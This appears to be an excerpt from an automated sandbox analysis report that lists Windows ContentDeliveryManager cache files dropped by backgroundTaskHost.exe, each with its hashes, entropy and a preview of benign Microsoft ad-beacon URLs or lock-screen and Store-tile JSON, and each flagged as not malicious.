                                                                              Preview:https://ris.api.iris.microsoft.com/v1/a/impression?CID=128000000000402926&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=400091688&UIT=P-&TargetID=700129702&AN=1538333990&PG=PC000P0FR5.0000000IRT&REQASID=73631FA46E444129A5A78BF513D8A83F&UNID=338388&ASID=2f9298d8ab8f4c23885c30ea9b373c83&PERSID=1A4A490328ED3BBECC8505EAE64E45F5&GLOBALDEVICEID=6966530473343700&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=5999d0853d524f7baa85da876e7b24cf&DEVOSVER=10.0.17134.1&REQT=20220720T155343&TIME=20220720T155416Z&ARCRAS=&CLR=CDM..https://ris.api.iris.microsoft.com/v1/a/impression?CID=128000000000402926&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=400091688&UIT=P-&TargetID=700129702&AN=1538333990&PG=PC000P0FR5.0000000IRT&REQASID=73631FA46E444129A5A78BF513D8A83F&UNID=338388&ASID=2f9298d8ab8f4c23885c30ea9b373c83&PERSID=1A4A490328ED3BBECC8505EAE64E45F5&GLOBALDEVICEID=69665304

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\eventbeacons.dat.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1180
                                                                              Entropy (8bit):5.385151819577346
                                                                              Encrypted:false
                                                                              SSDEEP:24:2AsfLW9g/OOIpZK7//hAsfLW9g/OOIpZK7//gj:psToSOPpZGXhAsToSOPpZGXgj
                                                                              MD5:65EB33016D1B4DB2040CDF583EF3B758
                                                                              SHA1:D985B7345D3CA9850DFE057B0BE00A12D184B4CE
                                                                              SHA-256:BBD72E11FAC5826D991FF15DC5BD26489F550E2B696AC5E6855A3940D49FD44E
                                                                              SHA-512:3CE2100B43852145BF6888C684E38ED8E873DC0E027A8A03141EED770145E68ED9927612B623AEAE5A75449C892BCEEDDD4826F210CE62FFE9854AAFC6CBF705
                                                                              Malicious:false
                                                                              Preview:https://ris.api.iris.microsoft.com/v1/a/impression?CID=128000000000402926&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=400091688&UIT=P-&TargetID=700129702&AN=1538333990&PG=PC000P0FR5.0000000IRT&REQASID=73631FA46E444129A5A78BF513D8A83F&UNID=338388&ASID=2f9298d8ab8f4c23885c30ea9b373c83&PERSID=1A4A490328ED3BBECC8505EAE64E45F5&GLOBALDEVICEID=6966530473343700&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=5999d0853d524f7baa85da876e7b24cf&DEVOSVER=10.0.17134.1&REQT=20220720T155343&TIME=20220720T155416Z&ARCRAS=&CLR=CDM..https://ris.api.iris.microsoft.com/v1/a/impression?CID=128000000000402926&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=400091688&UIT=P-&TargetID=700129702&AN=1538333990&PG=PC000P0FR5.0000000IRT&REQASID=73631FA46E444129A5A78BF513D8A83F&UNID=338388&ASID=2f9298d8ab8f4c23885c30ea9b373c83&PERSID=1A4A490328ED3BBECC8505EAE64E45F5&GLOBALDEVICEID=69665304

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\imprbeacons.dat (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1603
                                                                              Entropy (8bit):5.214817274751045
                                                                              Encrypted:false
                                                                              SSDEEP:24:28yUqz/WYg7/vipZHe7bkU/56Dj3Ufi9LNUN5p+TUTrKVXciYsiIj:QUqLWY0XipZQIG56ccBu+T+qXTSa
                                                                              MD5:C2EAAC79F33CDDC20DEA38D33A68B3AA
                                                                              SHA1:04DA6D1AAC53BD0651061BAC156E125D0BA08AE2
                                                                              SHA-256:C04615ACF35192B5F259CBD0F5E9C80361B1ADB72BD7179D60AD6B7A5308E978
                                                                              SHA-512:718FFD51ABDAB257B434D425A0156E7B0738EE334BE9C228AD17B8675AB1B02FB630133A787B6DB0544AB948E0DCD60B4E3E4F361381AA056748DE7CC0F7DB24
                                                                              Malicious:false
                                                                              Preview:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=400091688&TID=700129702&CID=128000000000402926&BID=1538333990&PG=PC000P0FR5.0000000IRT&TPID=400091688&REQASID=73631FA46E444129A5A78BF513D8A83F&ASID=2f9298d8ab8f4c23885c30ea9b373c83&TIME=20220720T155417Z&SLOT=1&REQT=20220720T155343&MA_Score=2&PERSID=1A4A490328ED3BBECC8505EAE64E45F5&GLOBALDEVICEID=6966530473343700&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=5999d0853d524f7baa85da876e7b24cf&BCNT=1&PG=PC000P0FR5.0000000IRT&UNID=338388&MAP_TID=B79907B4-9D53-42CB-801D-E74EAEB938FB&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=73631FA46E444129A5A78BF513D8A83F&REQASID=73631FA46E444129A5A78BF513D8A83F&ARC=1&EMS=1&AUTH=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&ID=1A4A490328ED3BBECC8505EAE64E45F5&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611219&RAFB=0&MARKETBASEDCOUNTRY=US&C

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\imprbeacons.dat.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1603
                                                                              Entropy (8bit):5.214817274751045
                                                                              Encrypted:false
                                                                              SSDEEP:24:28yUqz/WYg7/vipZHe7bkU/56Dj3Ufi9LNUN5p+TUTrKVXciYsiIj:QUqLWY0XipZQIG56ccBu+T+qXTSa
                                                                              MD5:C2EAAC79F33CDDC20DEA38D33A68B3AA
                                                                              SHA1:04DA6D1AAC53BD0651061BAC156E125D0BA08AE2
                                                                              SHA-256:C04615ACF35192B5F259CBD0F5E9C80361B1ADB72BD7179D60AD6B7A5308E978
                                                                              SHA-512:718FFD51ABDAB257B434D425A0156E7B0738EE334BE9C228AD17B8675AB1B02FB630133A787B6DB0544AB948E0DCD60B4E3E4F361381AA056748DE7CC0F7DB24
                                                                              Malicious:false
                                                                              Preview:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=400091688&TID=700129702&CID=128000000000402926&BID=1538333990&PG=PC000P0FR5.0000000IRT&TPID=400091688&REQASID=73631FA46E444129A5A78BF513D8A83F&ASID=2f9298d8ab8f4c23885c30ea9b373c83&TIME=20220720T155417Z&SLOT=1&REQT=20220720T155343&MA_Score=2&PERSID=1A4A490328ED3BBECC8505EAE64E45F5&GLOBALDEVICEID=6966530473343700&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=5999d0853d524f7baa85da876e7b24cf&BCNT=1&PG=PC000P0FR5.0000000IRT&UNID=338388&MAP_TID=B79907B4-9D53-42CB-801D-E74EAEB938FB&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=73631FA46E444129A5A78BF513D8A83F&REQASID=73631FA46E444129A5A78BF513D8A83F&ARC=1&EMS=1&AUTH=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&ID=1A4A490328ED3BBECC8505EAE64E45F5&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611219&RAFB=0&MARKETBASEDCOUNTRY=US&C

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815\c174b4f911d842a39252a6b31960e6c8_1 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1753
                                                                              Entropy (8bit):5.585343488022799
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yrw+lePMAK4/n80iiveVLsfWuKN/A6Wb7KDi3b36yFzkLSjhRKlnVbbRn:YrLtC7i8kLs/KV7yKDi3b3HFzkwhOnVJ
                                                                              MD5:2A9EA3CEDEF60F38CE074A7B942AE19B
                                                                              SHA1:8A5B1E5D0F23AA38A637146CB5329B3D4FEB45A7
                                                                              SHA-256:19A8A98F40C619E3EF175A6492EC80374536645307C54B1643A011CB82FA682E
                                                                              SHA-512:97E4A478453E8547194333E6C1C00353496E6C21105B5BD031064CC15AF05BA058BE72E1036BB0832133C42A2B38D6345816A2164EB3C61926C0E0AB01B1F0EC
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"itemPropertyManifest":{"noOp":{"type":"action"}},"items":[{"properties":{"noOp":{"event":"none","parameters":{"ctx.action":"noOp","ctx.containerPath":"//item[0]","ctx.contentId":"c174b4f911d842a39252a6b31960e6c8","ctx.creativeId":"1658332303`128000000001627409`0`c174b4f911d842a39252a6b31960e6c8`604800`280815`137271744000000000","ctx.cv":"g3+qLsJmZEqu892I.0","ctx.expiration":"137271744000000000","ctx.placementId":"SubscribedContent-280815","noOp":"//item[0]/property[noOp]"},"action":"noOp"}},"tracking":{"events":[{"id":"//item[0]?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?CID=128000000001627409&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID={EID}&&PID=425116123&UIT=P-&TargetID=700333390&AN=1515916689&PG=PC000P0FR5.0000000INM&REQASID=7DE70F5F82C34804959CEE9CEC27BD2C&UNID=280815&ID=1A4A490328ED3BBECC8505EAE64E45F5&ASID={ASID}

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815\c174b4f911d842a39252a6b31960e6c8_1.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1753
                                                                              Entropy (8bit):5.585343488022799
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yrw+lePMAK4/n80iiveVLsfWuKN/A6Wb7KDi3b36yFzkLSjhRKlnVbbRn:YrLtC7i8kLs/KV7yKDi3b3HFzkwhOnVJ
                                                                              MD5:2A9EA3CEDEF60F38CE074A7B942AE19B
                                                                              SHA1:8A5B1E5D0F23AA38A637146CB5329B3D4FEB45A7
                                                                              SHA-256:19A8A98F40C619E3EF175A6492EC80374536645307C54B1643A011CB82FA682E
                                                                              SHA-512:97E4A478453E8547194333E6C1C00353496E6C21105B5BD031064CC15AF05BA058BE72E1036BB0832133C42A2B38D6345816A2164EB3C61926C0E0AB01B1F0EC
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"itemPropertyManifest":{"noOp":{"type":"action"}},"items":[{"properties":{"noOp":{"event":"none","parameters":{"ctx.action":"noOp","ctx.containerPath":"//item[0]","ctx.contentId":"c174b4f911d842a39252a6b31960e6c8","ctx.creativeId":"1658332303`128000000001627409`0`c174b4f911d842a39252a6b31960e6c8`604800`280815`137271744000000000","ctx.cv":"g3+qLsJmZEqu892I.0","ctx.expiration":"137271744000000000","ctx.placementId":"SubscribedContent-280815","noOp":"//item[0]/property[noOp]"},"action":"noOp"}},"tracking":{"events":[{"id":"//item[0]?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?CID=128000000001627409&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID={EID}&&PID=425116123&UIT=P-&TargetID=700333390&AN=1515916689&PG=PC000P0FR5.0000000INM&REQASID=7DE70F5F82C34804959CEE9CEC27BD2C&UNID=280815&ID=1A4A490328ED3BBECC8505EAE64E45F5&ASID={ASID}

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\83a4606a9c604ec59350c94231b7a4ff_1 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):51075
                                                                              Entropy (8bit):5.587933088534143
                                                                              Encrypted:false
                                                                              SSDEEP:1536:+Eic+te6FD/cEz2qrQDnkAuiJqrJytvyfK54HAiM6:vic+t7FD/Tz2qOkAuicrJyVyfKuHAiR
                                                                              MD5:C3E070B5D13BEC38808435D6F13A6693
                                                                              SHA1:DDFB9346394A40E6F941ADF6A62E10BB1252ACEA
                                                                              SHA-256:56DBF3ECC97A0617CA700F20323B9858EA253D521A692A7AA6FBAECFAEB521DA
                                                                              SHA-512:562DA213F22D7360F3F0FEAA5BF0962D19ECD4EB776FF30F71F45A1C6962D44448AB913339C37AF65C627AD01B76687A7674548872080EEA239966A3E91B05D0
                                                                              Malicious:false
                                                                              Preview:{"itemPropertyManifest":{"storeCampaignId":{"type":"text","isOptional":true},"installApp":{"type":"boolean"},"installDelay":{"type":"text"},"swapStartTile":{"type":"action"},"displayName":{"type":"text"},"phoneticName":{"type":"text"},"packageSize":{"type":"numeric"},"launchStore":{"type":"action"},"onRender":{"type":"action"},"showNameOnMediumTile":{"type":"boolean"},"showNameOnWideTile":{"type":"boolean"},"showNameOnLargeTile":{"type":"boolean"},"smallTile":{"type":"image"},"collection":{"type":"numeric"},"mediumTile":{"type":"image"},"backgroundColor":{"type":"text"}},"propertyManifest":{},"properties":{},"tracking":{"events":[{"id":"/?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=dd1a8e84fd1343a98117c17a02a03b24&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.1713

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\83a4606a9c604ec59350c94231b7a4ff_1.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):51075
                                                                              Entropy (8bit):5.587933088534143
                                                                              Encrypted:false
                                                                              SSDEEP:1536:+Eic+te6FD/cEz2qrQDnkAuiJqrJytvyfK54HAiM6:vic+t7FD/Tz2qOkAuicrJyVyfKuHAiR
                                                                              MD5:C3E070B5D13BEC38808435D6F13A6693
                                                                              SHA1:DDFB9346394A40E6F941ADF6A62E10BB1252ACEA
                                                                              SHA-256:56DBF3ECC97A0617CA700F20323B9858EA253D521A692A7AA6FBAECFAEB521DA
                                                                              SHA-512:562DA213F22D7360F3F0FEAA5BF0962D19ECD4EB776FF30F71F45A1C6962D44448AB913339C37AF65C627AD01B76687A7674548872080EEA239966A3E91B05D0
                                                                              Malicious:false
                                                                              Preview:{"itemPropertyManifest":{"storeCampaignId":{"type":"text","isOptional":true},"installApp":{"type":"boolean"},"installDelay":{"type":"text"},"swapStartTile":{"type":"action"},"displayName":{"type":"text"},"phoneticName":{"type":"text"},"packageSize":{"type":"numeric"},"launchStore":{"type":"action"},"onRender":{"type":"action"},"showNameOnMediumTile":{"type":"boolean"},"showNameOnWideTile":{"type":"boolean"},"showNameOnLargeTile":{"type":"boolean"},"smallTile":{"type":"image"},"collection":{"type":"numeric"},"mediumTile":{"type":"image"},"backgroundColor":{"type":"text"}},"propertyManifest":{},"properties":{},"tracking":{"events":[{"id":"/?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=dd1a8e84fd1343a98117c17a02a03b24&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.1713

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\b9de0c2b2b3648e8a125cac302df5505_1 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):84129
                                                                              Entropy (8bit):5.6045734573835
                                                                              Encrypted:false
                                                                              SSDEEP:1536:9ctxExIx9n777l7oopjpBp4zZbZRZULtNWrpbWrpkWrp64Tp+W+X+oN5h5W52vfC:9ctxExIx9n777l7oopjpBp4zZbZRZULF
                                                                              MD5:F0AD6C0619ADA49C34DDD1019F8DF575
                                                                              SHA1:254EC0D8033AD7BEB5699D6EA26DB980412AB93E
                                                                              SHA-256:5190A4B1D216CA542EA5BC9C7071A4986A1CCE13A18282E94C34760BC43EFEBD
                                                                              SHA-512:B43869A2A39498F76EAD9917D3E9587767014CCE4E56E218AFB02AD9C6A98735E400532C0FA4C270EAAC7A8807DAAA04449FDD7AD47AD27ED25C8703CD720AD1
                                                                              Malicious:false
                                                                              Preview:{"itemPropertyManifest":{"storeCampaignId":{"type":"text","isOptional":true},"installApp":{"type":"boolean"},"installDelay":{"type":"text"},"swapStartTile":{"type":"action"},"displayName":{"type":"text"},"phoneticName":{"type":"text"},"packageSize":{"type":"numeric"},"launchStore":{"type":"action"},"onRender":{"type":"action"},"showNameOnMediumTile":{"type":"boolean"},"showNameOnWideTile":{"type":"boolean"},"showNameOnLargeTile":{"type":"boolean"},"smallTile":{"type":"image"},"collection":{"type":"numeric"},"mediumTile":{"type":"image"},"backgroundColor":{"type":"text"}},"propertyManifest":{},"properties":{},"tracking":{"events":[{"id":"/?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=62f7fc83080b4ea4bc961e27c15af7da&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.1713

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\b9de0c2b2b3648e8a125cac302df5505_1.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):84129
                                                                              Entropy (8bit):5.6045734573835
                                                                              Encrypted:false
                                                                              SSDEEP:1536:9ctxExIx9n777l7oopjpBp4zZbZRZULtNWrpbWrpkWrp64Tp+W+X+oN5h5W52vfC:9ctxExIx9n777l7oopjpBp4zZbZRZULF
                                                                              MD5:F0AD6C0619ADA49C34DDD1019F8DF575
                                                                              SHA1:254EC0D8033AD7BEB5699D6EA26DB980412AB93E
                                                                              SHA-256:5190A4B1D216CA542EA5BC9C7071A4986A1CCE13A18282E94C34760BC43EFEBD
                                                                              SHA-512:B43869A2A39498F76EAD9917D3E9587767014CCE4E56E218AFB02AD9C6A98735E400532C0FA4C270EAAC7A8807DAAA04449FDD7AD47AD27ED25C8703CD720AD1
                                                                              Malicious:false
                                                                              Preview:{"itemPropertyManifest":{"storeCampaignId":{"type":"text","isOptional":true},"installApp":{"type":"boolean"},"installDelay":{"type":"text"},"swapStartTile":{"type":"action"},"displayName":{"type":"text"},"phoneticName":{"type":"text"},"packageSize":{"type":"numeric"},"launchStore":{"type":"action"},"onRender":{"type":"action"},"showNameOnMediumTile":{"type":"boolean"},"showNameOnWideTile":{"type":"boolean"},"showNameOnLargeTile":{"type":"boolean"},"smallTile":{"type":"image"},"collection":{"type":"numeric"},"mediumTile":{"type":"image"},"backgroundColor":{"type":"text"}},"propertyManifest":{},"properties":{},"tracking":{"events":[{"id":"/?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=62f7fc83080b4ea4bc961e27c15af7da&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.1713

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\098c5115fc7f4ab9959905b886004365_1 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9667
                                                                              Entropy (8bit):5.6586743171290355
                                                                              Encrypted:false
                                                                              SSDEEP:192:fQrlMAvKMg2/IUjtlHB5BBt6GAvJwQBt6HNUg2QYYBt6yl:ag2FNt0vJwSt7g2at1
                                                                              MD5:1424E6329A25E3AB139025488A028B86
                                                                              SHA1:ED79BF18D5A617088725E664931957C1F3017EAB
                                                                              SHA-256:B915F8C90E0D53954458CAF79F56693DFDE5EDF1C3B8968AE6E2E37435125C72
                                                                              SHA-512:59AFE7F5DF654EB569F7AEB1E2D9D2C96736C3911478C0A569D0CBE348C773E090641386FD65E05E53D544081661459EF69F179A1885D022425062EF09D8CC5D
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":647111,"height":1080,"sha256":"IBXUrFeoQltv0Xj9XLyU5hwStkq6T5kx+/lV3eVqUR8=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\842e4e4ad8e41e6a893a996baa08c061072d3b11c57f83bbc8f6b5992f9c5613"},"portraitImage":{"fileSize":693351,"height":1920,"sha256":"aZds5OTEsKnOdFR8MLLboneq5nIEWnYQlGuXeadbKGk=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\6bce4edafa1d5562be892960e9a791e50699ffe57ea4fcf4b5b5456308a2e95f"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","ctx.co

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\098c5115fc7f4ab9959905b886004365_1.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9667
                                                                              Entropy (8bit):5.6586743171290355
                                                                              Encrypted:false
                                                                              SSDEEP:192:fQrlMAvKMg2/IUjtlHB5BBt6GAvJwQBt6HNUg2QYYBt6yl:ag2FNt0vJwSt7g2at1
                                                                              MD5:1424E6329A25E3AB139025488A028B86
                                                                              SHA1:ED79BF18D5A617088725E664931957C1F3017EAB
                                                                              SHA-256:B915F8C90E0D53954458CAF79F56693DFDE5EDF1C3B8968AE6E2E37435125C72
                                                                              SHA-512:59AFE7F5DF654EB569F7AEB1E2D9D2C96736C3911478C0A569D0CBE348C773E090641386FD65E05E53D544081661459EF69F179A1885D022425062EF09D8CC5D
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":647111,"height":1080,"sha256":"IBXUrFeoQltv0Xj9XLyU5hwStkq6T5kx+/lV3eVqUR8=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\842e4e4ad8e41e6a893a996baa08c061072d3b11c57f83bbc8f6b5992f9c5613"},"portraitImage":{"fileSize":693351,"height":1920,"sha256":"aZds5OTEsKnOdFR8MLLboneq5nIEWnYQlGuXeadbKGk=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\6bce4edafa1d5562be892960e9a791e50699ffe57ea4fcf4b5b5456308a2e95f"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","ctx.co

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\2b5e800dda5d4fe0804933c66ff1142b_1 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9581
                                                                              Entropy (8bit):5.612212044178936
                                                                              Encrypted:false
                                                                              SSDEEP:192:n/lWHlAAvKNhSAttlHB5QBt4YGCBtJ+95DBtASWMA:NKGYsEt3tw9/tnA
                                                                              MD5:522625EF444FEA713AFDC8736BC71508
                                                                              SHA1:D1E0D3D45069C2953E16B6567220606DF590B36A
                                                                              SHA-256:D3DCB530086ECA5F1EA82C08B860014428AC8E96C64E73629719EA8B3272B747
                                                                              SHA-512:52DE8F2FCD421FA26CDBCAB55FFC00B2AB763B8322F06099F649BD228EE58599E57EDF5169CE7624B3C80B68521B8506266BF484C76905ADCC37CE87F422ACC5
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":1708865,"height":1080,"sha256":"D0HX28nyO5NQd6kgwDFGgC/6JrE0LlomLmJ1DdzdriE=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\cf0e347e4829f32b660aa0a3b28c38bd7cba4cc57aa78e26c6d08bdb37dbb4a7"},"portraitImage":{"fileSize":1660833,"height":1920,"sha256":"PpfCRreo37BZAhX8PHI2WD1K/f7wMV2Jdwu4/nMF3xw=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\963e3f45523380a2c6863a4e725418b8c00a5272db711428aa77a85033610e1c"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","ctx.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\2b5e800dda5d4fe0804933c66ff1142b_1.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9581
                                                                              Entropy (8bit):5.612212044178936
                                                                              Encrypted:false
                                                                              SSDEEP:192:n/lWHlAAvKNhSAttlHB5QBt4YGCBtJ+95DBtASWMA:NKGYsEt3tw9/tnA
                                                                              MD5:522625EF444FEA713AFDC8736BC71508
                                                                              SHA1:D1E0D3D45069C2953E16B6567220606DF590B36A
                                                                              SHA-256:D3DCB530086ECA5F1EA82C08B860014428AC8E96C64E73629719EA8B3272B747
                                                                              SHA-512:52DE8F2FCD421FA26CDBCAB55FFC00B2AB763B8322F06099F649BD228EE58599E57EDF5169CE7624B3C80B68521B8506266BF484C76905ADCC37CE87F422ACC5
